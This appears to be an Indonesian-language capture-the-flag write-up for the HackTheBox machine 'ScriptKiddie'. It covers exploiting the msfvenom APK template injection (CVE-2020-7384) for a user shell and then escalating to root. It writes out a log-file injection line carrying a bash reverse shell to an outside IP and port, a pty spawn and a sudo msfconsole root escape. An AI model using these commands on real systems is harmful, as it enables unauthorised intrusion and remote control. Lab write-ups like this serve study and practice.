Metasploit MsfVenom Apk

Author: Zulkarnaen

ScriptKiddie

INTRO

HackThebox ScriptKiddie Adalah Box Dengan Tingkat Kesulitan Mudah, Tingkat Mechine Matrix Lebih Mengarah Ke CVE-2020-7384 , Application Yang Retan Dimesin Tersebut Adalah Metasploit MsfVenom Apk Tamplate , Exploitation : Metasploit MsfVenom Apk Tamplate Cmd Injection , Bash For Loop , Description Kerentanan : Tamplate msfvenom Metasploit Rapid7 menangani file APK dengan cara yang memungkinkan pengguna jahat membuat dan menerbitkan file yang akan menjalankan perintah sewenang-wenang di mesin korban.

CTF:

  • CVE

  • CTF Like

Alat - Alat Hacking :

  • nmap

  • Metasploit

  • Linpeash

  • Bash

  • Python

  • nc

Nmap

Tipikal langkah pertama Saat saya Melihat Port 5000.

output :

5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)

Kami menemukan 3 Tools Di Server HTTP Target :

  • Scan Top 100 ports on an ip

  • Venom it up - gen rev tcp meterpreter bins

  • Searchsploit FTW

Tambahkan Domain Berikut Kedalam Daftar Local Host : 

sudo nano /etc/hosts + 10.10.10.222 scriptkiddie.htb

CVE-2020-7384

Setelah beberapa jam menjelajah , Kami Menyadari Bahwa , Tools Payload Rentan Terhadap Serangan Injection . Jenis Kerentanan Tersebut Adalah :

Tamplate msfvenom Metasploit Rapid7 menangani file APK dengan cara yang memungkinkan pengguna jahat membuat dan menerbitkan file yang akan menjalankan perintah sewenang-wenang di mesin korban.

Download Disini : Metasploit_msfvenom_apk_template_cmd_injection.rb

CVE-Like

Cara Mengexploitasi Kerentanan :

  • Open Metasploit , Gunakan Modul Metasploit_msfvenom_apk_template_cmd_injection , Jika Tidak Ada , Download Module Dan Tambahkan Kedalam Folder Metasploit e.g /usr/share/metasploit-framework/module/exploits/unix/fileformat/

  • Setelah Berhasil Didownload , Set Lhost Menggunakan Ip Server Kalian , Lalu Ketik Run .

  • Setelah File Template Nya Jadi , Upload File Tersebut Ke Server Target , Dibagian Template , Lalu Dibagian Lhost Masukan Ip Kalian , Sebelum Disubmit , Hidup Kan Netcat Sesuai Port Yang Telah Anda Set

  • Dan Jika Berhasil Anda Akan Mendapat Kan Shell User Kid.

Privilege Escalations

Ok kita Harus Dapatkan Akses User pwn , ayo Dapat Kan Akses Root Nya .

Setelah Berapa Jam Mencari Celah Menggunakan Linpeas , Untuk Masuk Sebagai Root , Akhir Nya Kita Mendapati , Bahwa File , scanlosers.sh Pada Folder /home/pwn , Itu Membaca File /home/kid/logs/hackers , Setelah Saya Mencoba Berpikir Lebih Keras Bagaimana Cara Mendapatkan Shell untuk user pwn , Akhir nya Kita Menemukan Jalan Nya

Lakukan Perintah Berikut :

  • Pertama Saya Akan Memeriksa , Dari Mana Asal File /home/kid/logs/hackers , Dan Apa Proses Apa Yang Dijalankan Untuk File Hackers Tersebut , Setelah Berapa Lama Berpikir Akhir Nya Kita Menemukan Kejanggalan Nya .

  • Ketika Tools Payload Pada HTTP Server Port 5000 Dijalankan , Maka Secara Otomatis Logs Pada Tools Tersebut Akan Disimpan Kedalam FIle /home/kid/logs/hackers . Kalian Bisa Mencoba Nya Dengan Perintah Berikut : 

while :; do cat /home/kid/logs/hackers ; done

Setelah Itu Gunakan Tools Payload Pada Website Target , Dan Kalian Akan Mendapatkan Logs Tools Tersebut Di file hackers .

Perhatian : Logs Tersebut Hanya DIcatat Difile /home/kid/logs/hackers Itu Berfungsi Jika Kalian Hanya Menggunakan Tools Payload Android .

Oke Sekarang Kita Sudah Tau Cara Kerja File /home/kid/logs/hackers Tersebut , Tinggal Kita Exploitasi Kecatatan tersebut Dengan Cara : 

while :; do echo "[2021-02-09 13:20:00.634706] 10.10.14.73 ; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.10/4242 0>&1' # " > /home/kid/logs/hackers ; done
python3 -c "import pty;pty.spawn('/bin/bash')"

Lalu Jalankan Netcat , Dan Gunakan Tools Payload Pada Website Target , Bersamaan Dengan Template Nya .

Jika Berhasil Anda Akan Mendapatkan Shell User Pwn .

Pada Bagian Ini Cukup Mudah Untuk Dicerna , Kalian Hanya Tinggal Mengketikan sudo -l Anda Akan Melihat Bahwa file /opt/metasploit-framework-6.0.9/msfconsole Bisa Digunakan Tanpa Password : 

(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

Anda Bisa Menjalankan file Tersebut Menggunakan Sudo Dan Ketika Kalian Berhasil Masuk Kedalam Tools Metasploit , Lalu Jalankan Perintah Berikut : 

/bin/bash -i

Dan Boom , Kalian Akan Menjadi Root Sekarang : )

Last updated

Was this helpful?